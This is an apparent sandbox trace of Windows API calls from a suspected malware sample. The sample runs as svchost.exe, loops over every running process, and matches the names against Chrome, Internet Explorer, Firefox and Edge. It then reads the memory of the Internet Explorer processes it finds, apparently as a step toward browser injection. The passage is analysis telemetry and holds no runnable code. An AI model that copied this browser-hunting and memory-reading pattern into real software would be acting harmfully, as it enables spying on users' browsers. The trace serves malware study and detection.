	[0229.472] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.473] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0229.473] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.473] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0229.474] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.474] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0229.474] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.474] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0229.474] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0229.475] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x6544
	[0229.475] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.475] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0229.476] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.476] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0229.476] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.478] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0229.479] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.479] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0229.479] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0229.480] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x6548
	[0229.480] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.480] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0229.480] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.481] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0229.481] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.481] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0229.481] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.481] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0229.481] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0229.482] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0x654c
	[0229.482] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.482] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0229.482] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.482] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0229.483] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.483] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0229.483] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.483] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0229.483] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0229.484] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0x6550
	[0229.484] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.484] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0229.484] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.485] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0229.485] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.485] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0229.486] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.486] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0229.486] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fact-film-anticipated.exe")) returned 1
	[0229.487] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb40) returned 0x6554
	[0229.487] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.487] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="chrome.exe") returned 0x0
	[0229.487] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.487] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="iexplore.exe") returned 0x0
	[0229.488] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.488] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="firefox.exe") returned 0x0
	[0229.489] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.489] StrStrIA (lpFirst="fact-film-anticipated.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0229.489] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wanting villages.exe")) returned 1
	[0229.490] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb50) returned 0x6558
	[0229.490] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.490] StrStrIA (lpFirst="wanting villages.exe", lpSrch="chrome.exe") returned 0x0
	[0229.491] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.491] StrStrIA (lpFirst="wanting villages.exe", lpSrch="iexplore.exe") returned 0x0
	[0229.491] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.491] StrStrIA (lpFirst="wanting villages.exe", lpSrch="firefox.exe") returned 0x0
	[0229.492] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.492] StrStrIA (lpFirst="wanting villages.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0229.493] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="engagementresearchersmonkey.exe")) returned 1
	[0229.493] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb60) returned 0x655c
	[0229.493] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.493] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="chrome.exe") returned 0x0
	[0229.494] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.494] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="iexplore.exe") returned 0x0
	[0229.495] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.495] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="firefox.exe") returned 0x0
	[0229.496] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.496] StrStrIA (lpFirst="engagementresearchersmonkey.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0229.496] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="surgical-marcus.exe")) returned 1
	[0229.497] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb70) returned 0x6560
	[0229.497] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.497] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="chrome.exe") returned 0x0
	[0229.498] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.498] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="iexplore.exe") returned 0x0
	[0229.498] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.498] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="firefox.exe") returned 0x0
	[0229.499] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.499] StrStrIA (lpFirst="surgical-marcus.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0229.499] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0229.500] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc38) returned 0x6564
	[0229.500] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.500] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0229.500] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.500] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0229.500] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.501] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0229.501] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.501] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0229.501] NtQueryInformationProcess (in: ProcessHandle=0x6564, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0229.501] ReadProcessMemory (in: hProcess=0x6564, lpBaseAddress=0x7ffdb000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0229.501] ReadProcessMemory (in: hProcess=0x6564, lpBaseAddress=0x2b11c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0229.501] ReadProcessMemory (in: hProcess=0x6564, lpBaseAddress=0x2b1998, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0229.502] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0229.502] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0xc38, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1
	[0229.502] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc94) returned 0x6568
	[0229.503] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.503] StrStrIA (lpFirst="iexplore.exe", lpSrch="chrome.exe") returned 0x0
	[0229.503] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.503] StrStrIA (lpFirst="iexplore.exe", lpSrch="iexplore.exe") returned="iexplore.exe"
	[0229.503] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.503] StrStrIA (lpFirst="iexplore.exe", lpSrch="firefox.exe") returned 0x0
	[0229.504] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.504] StrStrIA (lpFirst="iexplore.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0229.504] NtQueryInformationProcess (in: ProcessHandle=0x6568, ProcessInformationClass=0x0, ProcessInformation=0x101f2e4, ProcessInformationLength=0x18, ReturnLength=0x101f300 | out: ProcessInformation=0x101f2e4, ReturnLength=0x101f300) returned 0x0
	[0229.504] ReadProcessMemory (in: hProcess=0x6568, lpBaseAddress=0x7ffde000, lpBuffer=0x101f0cc, nSize=0x1d8, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f0cc*, lpNumberOfBytesRead=0x101f310*=0x1d8) returned 1
	[0229.504] ReadProcessMemory (in: hProcess=0x6568, lpBaseAddress=0x911c0, lpBuffer=0x101ee3c, nSize=0x290, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101ee3c*, lpNumberOfBytesRead=0x101f310*=0x290) returned 1
	[0229.504] ReadProcessMemory (in: hProcess=0x6568, lpBaseAddress=0x919ba, lpBuffer=0x101f40c, nSize=0x20, lpNumberOfBytesRead=0x101f310 | out: lpBuffer=0x101f40c*, lpNumberOfBytesRead=0x101f310*=0x20) returned 1
	[0229.504] StrStrIW (lpFirst="Winsta0\\Default", lpSrch="default") returned="Default"
	[0229.504] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x914, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x34c, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0229.505] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x914) returned 0x656c
	[0229.505] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.505] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0229.506] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.506] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0229.506] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.506] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0229.506] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.506] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0229.507] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x914, pcPriClassBase=6, dwFlags=0x0, szExeFile="tadiapce.exe")) returned 1
	[0229.507] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x214) returned 0x6570
	[0229.507] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.507] StrStrIA (lpFirst="tadiapce.exe", lpSrch="chrome.exe") returned 0x0
	[0229.508] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.508] StrStrIA (lpFirst="tadiapce.exe", lpSrch="iexplore.exe") returned 0x0
	[0229.509] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.509] StrStrIA (lpFirst="tadiapce.exe", lpSrch="firefox.exe") returned 0x0
	[0229.509] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.509] StrStrIA (lpFirst="tadiapce.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0229.510] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaa8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0229.510] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaa8) returned 0x6574
	[0229.510] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.511] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0229.511] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.511] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0229.511] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.512] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0229.512] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.512] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0229.512] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x110, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x214, pcPriClassBase=6, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0229.513] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0229.514] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x6d8) returned 0x6578
	[0229.514] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.514] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0229.515] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.515] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0229.515] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.515] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0229.515] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.515] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0229.515] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0229.516] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa70) returned 0x657c
	[0229.516] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.516] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0229.517] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.517] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0229.517] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.517] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0229.517] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.517] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0229.518] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0229.518] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xc20) returned 0x6580
	[0229.518] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.518] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0229.519] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.519] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0229.519] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.519] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0229.519] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.519] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0229.520] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa80, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1
	[0229.520] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa80) returned 0x6584
	[0229.521] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.521] StrStrIA (lpFirst="dllhost.exe", lpSrch="chrome.exe") returned 0x0
	[0229.521] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.521] StrStrIA (lpFirst="dllhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0229.521] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.521] StrStrIA (lpFirst="dllhost.exe", lpSrch="firefox.exe") returned 0x0
	[0229.522] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.522] StrStrIA (lpFirst="dllhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0229.522] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0229.523] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb28) returned 0x6588
	[0229.523] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.523] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0229.523] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.523] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0229.526] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.526] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0229.526] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.526] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0229.526] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb28, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x214, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0
	[0229.527] CloseHandle (hObject=0x4fd0) returned 1
	[0229.527] Sleep (dwMilliseconds=0x64) 
	[0229.634] GetCurrentProcessId () returned 0x110
	[0229.634] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4fd0
	[0229.638] Process32First (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0229.639] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0229.640] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0229.641] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x104) returned 0x658c
	[0229.641] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.641] StrStrIA (lpFirst="smss.exe", lpSrch="chrome.exe") returned 0x0
	[0229.641] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.641] StrStrIA (lpFirst="smss.exe", lpSrch="iexplore.exe") returned 0x0
	[0229.641] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.641] StrStrIA (lpFirst="smss.exe", lpSrch="firefox.exe") returned 0x0
	[0229.642] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.642] StrStrIA (lpFirst="smss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0229.642] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0229.643] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x148) returned 0x6590
	[0229.643] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.643] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0229.644] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.644] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0229.644] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.644] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0229.644] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.644] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0229.645] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0229.645] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x6594
	[0229.645] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.645] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0229.646] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.646] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0229.646] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0229.646] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
